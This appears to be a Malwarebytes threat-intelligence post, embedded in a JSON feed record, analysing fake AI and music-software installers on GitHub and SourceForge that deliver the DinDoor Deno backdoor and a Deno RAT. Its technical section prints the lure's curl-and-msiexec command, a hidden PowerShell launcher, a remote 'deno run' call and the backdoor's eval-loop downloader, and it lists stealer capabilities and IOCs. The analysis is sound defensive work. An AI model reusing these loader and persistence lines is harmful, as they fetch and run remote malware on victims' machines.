{“lastseen”:”2026-05-26T14:05:07″,”description”:”During our threat hunting activities, we found fake installers and plugins impersonating popular software including ChatGPT, Claude, AutoTune, and Kontakt on GitHub and SourceForge distributing a Deno backdoor known as **DinDoor**. Attackers are using compromised YouTube channels to distribute links to these platforms. \\n\\nDinDoor ultimately drops different types of malware, including a stealthy remote access Trojan (RAT), which also uses the Deno JavaScript runtime. \\n\\nAttackers are increasingly abusing alternative JavaScript runtimes like Bun and Deno to bypass traditional detection methods. In one of our recent investigations we documented how attackers are using Bun as an initial infection vector to distribute NWHStealer. And in March, ThreatDown researchers also observed attackers using Deno to deliver CastleLoader through a multi-stage infection chain involving the ClickFix lure. \\n\\nThese campaigns use **Scoop** (an alternative installer for Windows) and **WinGet** (the official Windows package manager) to install Deno on the victim’s machine. They then use the Deno runtime to execute a RAT capable of executing additional payloads, exfiltrating data from browsers, wallets, and other applications, which has an interesting peer-to-peer feature that uses Edge to hide malicious traffic. \\n\\n## Legitimate platforms abused to spread malware\\n\\nThe infection chain is usually started via **MSI files** or **PowerShell scripts** downloaded from GitHub or SourceForge in most of the analyzed cases. Users are usually redirected to these malicious repositories via compromised YouTube channels. These videos currently total more than 50,000 views. \\n\\n _Compromised YouTube channels with AI-generated videos_\\n\\nThe compromised YouTube channels create posts promoting different software and constantly switch between GitHub accounts to distribute the malware. \\n\\n_YouTube posts linking to the malicious GitHub repositories_\\n\\nThe fake software appears designed to target creators, AI enthusiasts, gamers, and technically inclined users who are more likely to download unofficial tools, cracked software, or community-distributed installers from sites like GitHub and SourceForge. We\u2019ve observed fake MSIs and scripts masquerading as installers and plugins for legitimate software and brands such as ChatGPT, Claude, ZENOLOGY, Ableton Live, AutoTune, Kontakt. \\n\\n_GitHub repository for fake ChatGPT installer_\\n\\nThe malicious repositories have a command for both Windows and macOS. These repositories ask users to open the terminal and copy a malicious command, which downloads and executes the MSI from GitHub. \\n\\n_Fake plugin that asks the user to copy and execute the malicious command_\\n\\nMalicious GitHub accounts create multiple repositories filled with fake software and plugins related to popular software to lure in more users. \\n\\n_GitHub account with different malicious repositories_\\n\\nWe found that the same backdoor was distributed through SourceForge, mimicking a legitimate game software called GearUP and an AI watermark remover software called BWR. \\n\\n _The malicious MSI files hosted on SourceForge_\\n\\n## How to stay safe \\n\\nThe attackers relied heavily on trust. GitHub and SourceForge are legitimate platforms, which makes fake projects look more convincing. We contacted GitHub, which quickly removed the malicious repositories, but users should expect new ones to continue appearing.\\n\\nHere are a few simple ways to stay safe: \\n\\n * Only download software from official vendor websites. \\n * Be skeptical of \u201cfree\u201d, cracked, or unofficial versions of paid software. \\n * Be cautious with downloads from GitHub, SourceForge, forums, or file-sharing sites, especially from new or unknown accounts. \\n * Attackers continue to create new profiles to distribute this malware across platforms. Check the developer or publisher\u2019s profile, its reputation, and how recently it was created before downloading anything. \\n * Check that archive contents, images, and text files align with what you expected to download. Archive names and structures often follow recognizable malicious patterns. \\n * Check the file’s publisher and digital signature before you run it. Windows, you can usually check this by right-clicking the file, selecting **Properties** \\u003e **Digital Signatures**. Keep in mind that a valid signature does not guarantee a file is safe, but missing or suspicious signatures are often a red flag. \\n\\n\\n\\n## Technical analysis \\n\\nThe malicious GitHub repositories ask the user to open cmd and execute a malicious command. The malicious commands download an MSI from GitHub and install it via `msiexec`. These repositories sometimes also contain PowerShell scripts to similarly initiate the infection chain. \\n\\nExample of a malicious command hosted on GitHub that starts the infection chain: \\n \\n \\n curl -Lo %temp%\\\\s.msi https:\/\/raw.githubusercontent.com\/claude-free-plugin\/install\/main\/install.msi \\u0026\\u0026 msiexec \/i %temp%\\\\s.msi\u00a0\\n\\nThe MSI drops a CMD file and a PowerShell script in a random directory specified in the MSI `InstallationFolder` and registry values. We detected different structures for these MSIs, with JavaScript instead of the CMD file, or with additional embedded files.\\n\\n_The \u201cPs1File\u201d and \u201cCmdFile\u201d inside the MSI dropper_\\n\\nThe CMD file executes the PowerShell script, with a name that changes in the analyzed infection chains: \\n \\n \\n @set \\”SCRIPTDIR=%~dp0\\” @powershell.exe -NoProfile\u00a0-ExecutionPolicy\u00a0Bypass -WindowStyle\u00a0Hidden -Command \\”Start-Process\u00a0powershell\u00a0-ArgumentList\u00a0(‘-NoProfile\u00a0-ExecutionPolicy\u00a0Bypass -WindowStyle\u00a0Hidden -File \\”\\”‘ + $env:SCRIPTDIR\u00a0+ ‘{Random name}.ps1\\”\\”‘) -WindowStyle\u00a0Hidden\\”\u00a0\\n\\n_The executed PowerShell script_\\n\\nThe PowerShell script takes care of: \\n\\n * Ensuring the package manager Scoop is installed, and installing it if missing with the official script from `get.scoop.sh`. Scoop is a popular, open-source command-line software installer and package manager for Microsoft Windows. \\n * Using Scoop to install WinGet (Windows Package Manager) if missing. \\n * Installs Deno (a JavaScript\/TypeScript runtime) via WinGet or Scoop if not present.\\n\\n\\n\\nThe usage of the package managers Scoop and WinGet to install additional software on the compromised machine is an interesting approach that gives the attacker more flexibility. \\n\\nCommand executed to install Deno using WinGet: \\n \\n \\n \\”C:\\\\Users\\\\admin\\\\scoop\\\\apps\\\\winget\\\\current\\\\winget.exe\\” install –id\u00a0DenoLand.Deno\u00a0-e –accept-source-agreements –accept-package-agreements –silent\\n\\n### The DinDoor Backdoor \\n\\nNext, the following stage is executed with the downloaded Deno executable: \\n \\n \\n \\”C:\\\\Users\\\\admin\\\\AppData\\\\Local\\\\Microsoft\\\\WinGet\\\\Packages\\\\DenoLand.Deno_Microsoft.Winget.Source_8wekyb3d8bbwe\\\\deno.exe\\” run -A http:\/\/{C2}\/{random_path}.js\\n\\nThe returned code (the internal name is \u201clauncher-1\u201d) is a small eval-loop function that downloads the next stage (the internal name is \u201clauncher-2\u201d). The downloaded backdoor is publicly known as **DinDoor**. \\n \\n \\n var a=\\”{C2}\\”.split(\\”,\\”),i=0;for(;;){let e=null;try{let t=await fetch(a[i%a.length]+\\”\/{BUILD_ID}.js\\”);if(!t.ok)throw 0;e=await\u00a0t.text()}catch{i++,await new Promise(t=\\u003esetTimeout(t,5e3));continue}try{await(0,eval)(\\”(async()=\\u003e{\\”+e+\\”})()\\”)}catch{}await new Promise(t=\\u003esetTimeout(t,3e4))}\\n\\nThe backdoor handles persistence, sends information about the compromised system to the command-and-control server (C2), and executes additional payloads and commands returned by the C2. The HTTP endpoints used for C2 communications vary between the analyzed cases. \\n\\nThe backdoor obtains an ID from an HTTP endpoint (for example, `\/security-pool`) and then uses that ID to obtain the next stage from `\/v2{ID}.js`. \\n\\nThe obtained stage is executed via `stdin` without being written to disk, using the command: \\n \\n \\n deno\u00a0run -A –no-check \u2013\\n\\nTo achieve persistence, the backdoor runs a PowerShell command to create a RUN key that executes the downloader \u201clauncher-1\u201d used previously: \\n \\n \\n conhost.exe –headless \\”\\u003cdeno.exe\\u003e\\” -A \\”%APPDATA%\\\\\\u003chash\\u003e.js\\n\\nThis backdoor distributes several malware families in the analyzed cases. In this blog, we analyze one of the distributed payloads: a RAT that uses the Deno JavaScript runtime. \\n\\n### Deno RAT \\n\\nThe delivered RAT, like the other analyzed scripts, uses the Deno JavaScript environment and has full functionality to control the device, execute commands and payloads, and exfiltrate various types of data through its built-in stealer module. \\n\\nWe did not find a specific name or attribution for this RAT. In the past, the RAT has been referred to as \u201cSmokest\u201d based on a specific value in the config. The similar commenting style and shared infrastructure suggest that the DinDoor developer and the RAT developer may be the same person or team. \\n\\n* * *\\n\\n\\n\\n### Picked up something you shouldn’t have?\\n\\nRUN A FREE VIRUS SCAN\\n\\n* * *\\n\\nIn addition to HTTP for C2 communication, the RAT also supports **WebSocket** communication, enabled when the JSON value `isLiveEnabled` returned from the C2 is set to true. \\n\\n_The main function of the Deno RAT_\\n\\nThe RAT supports different commands (`exec`, `exec-ps`, `exec-sc`, `sysinfo`, `screenshot`, `stealer`) and functionality: \\n\\n * Collect system information about the compromised device \\n * Full bidirectional control through a custom VNC implementation over WebSocket \\n * Target more than 50 crypto wallet extensions and 10 crypto software folders such as Atomic Wallet, Exodus, Electrum, and ByteCoin\\n * Collect data from browsers including Chrome, Chromium, Brave, Edge, Avast Browser, Edge, Opera, Vivaldi, CentBrowser, Kometa, Orbitum, 360Browser, and Chromodo \\n * Exfiltrate Telegram, Discord, and Lightcord data \\n * Record and modify clipboard data \\n * List folders, files and exfiltrate content from files with specific extensions \\n * Capture screenshots using different methods \\n * Execute additional payloads \\n * Launch or terminate arbitrary processes \\n * Execute commands with PowerShell \\n * Establish SOCKS5 proxy tunnels over WebSocket \\n\\n\\n\\nOne of the most interesting parts of the RAT is a **peer-to-peer streaming mode** that uses the Edge browser to hide traffic and make detection more difficult. \\n\\nTo stream live video directly to the operator without routing it through the C2 server, the RAT spawns a hidden Microsoft Edge process and connects to it via Chrome DevTools Protocol (CDP). It then injects a small WebRTC HTML page into Edge, turning the legitimate browser into a peer-to-peer video relay. The Deno agent captures and H.264-encodes the victim’s screen, passes the frames to the Edge page over CDP, and Edge forwards them directly to the operator’s browser over an encrypted WebRTC DataChannel. SDP and ICE signaling, needed to establish the direct connection, is exchanged through the existing C2 WebSocket. \\n\\n_The injected HTML page inside Edge browser_\\n\\nThe RAT uses the following endpoints for C2 communication, which can vary between samples: \\n\\n * `\/health`: checks the \u201cok\u201d response from the C2 \\n * `\/token`: receive config parameters, task delivery, results, and exfiltrated data \\n * `\/vnc\/agent\/`: WebSocket path used for VNC communication \\n\\n\\n\\nThe config data is Base64-encoded and is sent in communications with the C2 as an authorization token. Decoded config data: \\n \\n \\n {\u00a0\\n \\n \u00a0 \\”buildId\\”: \\”cd361ef3159f5ce9\\”,\u00a0\\n \\n \u00a0 \\”buildNote\\”: \\”BWR\\”,\u00a0\\n \\n \u00a0 \\”buildType\\”: \\”msi-v2\\”,\u00a0\\n \\n \u00a0 \\”proxyUrls\\”: [\\”{C2}\\”],\u00a0\\n \\n \u00a0 \\”userId\\”: \\”\u2026\\”,\u00a0\\n \\n \u00a0 \\”accessTokenHash\\”: \\”\u2026\\”,\u00a0\\n \\n \u00a0 \\”iat\\”: 1779372546,\u00a0\\n \\n \u00a0 \\”exp\\”: 2094948546\u00a0\\n \\n }\\n\\nWe found different versions of this RAT, including a \u201clight\u201d version called \u201cagent-lite\u201d that supports only a few commands and uses Cloudflare Workers for C2 communication. \\n\\n_The \u201clight\u201d version of the RAT_\\n\\n## Acknowledgements \\n\\n * DinDoor: https:\/\/hunt.io\/blog\/dindoor-deno-runtime-backdoor-msi-analysis\\n * Smokest: https:\/\/x.com\/vxunderground\/status\/2013006601133687004\\n\\n\\n\\n## Indicators of Compromise (IOCs) \\n\\n**URLs**\\n\\n * `https[:]\/\/github.com\/claude-free-plugin\/`\\n * `https[:]\/\/github.com\/ai-gen-profi `\\n * `https[:]\/\/github.com\/wharfdemolisherpit `\\n * `https[:]\/\/sourceforge.net\/projects\/gearup\/ `\\n * `https[:]\/\/sourceforge.net\/projects\/bluewaveremover\/`\\n\\n\\n\\n**Domains**\\n\\n * `claudescript[.]top`: distribution website \\n * `ms-telemetry-gateway-us[.]com`: C2 \\n * `dakatawebstick[.]com`: C2 \\n * `ashpaltlonpro[.]com`: C2 \\n * `cf-proxy[.]cloud-analytics-services[.]workers.dev`: C2 \\n * `agilemast3r[.]duckdns[.]org`: C2 \\n * `geralnewlong[.]com`: C2 \\n * `hngfbgfbfb[.]cyou`: C2 \\n * `logicalnewrestore[.]com`: C2\\n\\n\\n\\n**IPs**\\n\\n * `23[.]227[.]196[.]107`: C2 \\n * `45[.]137[.]99[.]121`: C2 \\n * `31[.]57[.]129[.]23`: C2 \\n * `66[.]78[.]40[.]107`: C2 \\n * `193[.]233[.]198[.]132`: C2\\n\\n\\n\\n* * *\\n\\n**We don\u2019t just report on threats\u2014we remove them**\\n\\nCybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.”,”published”:”2026-05-26T13:07:09″,”modified”:”2026-05-26T13:07:09″,”type”:”malwarebytes”,”title”:”Fake software on GitHub and SourceForge distribute Deno RAT”,”source”:””,”references”:””,”id”:”MALWAREBYTES:533B45EDBE79B1BE1D01EAB1CA7FBE5B”,”bulletinFamily”:”blog”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.malwarebytes.com\/blog\/threat-intel\/2026\/05\/fake-software-on-github-and-sourceforge-distribute-deno-rat”,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-26T14:05:07″,”description”:”During our threat hunting activities, we found fake installers and plugins impersonating popular software including ChatGPT, Claude, AutoTune, and Kontakt on GitHub and SourceForge distributing…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,115,13,33,7,11,5],"class_list":["post-56923","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-malwarebytes","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n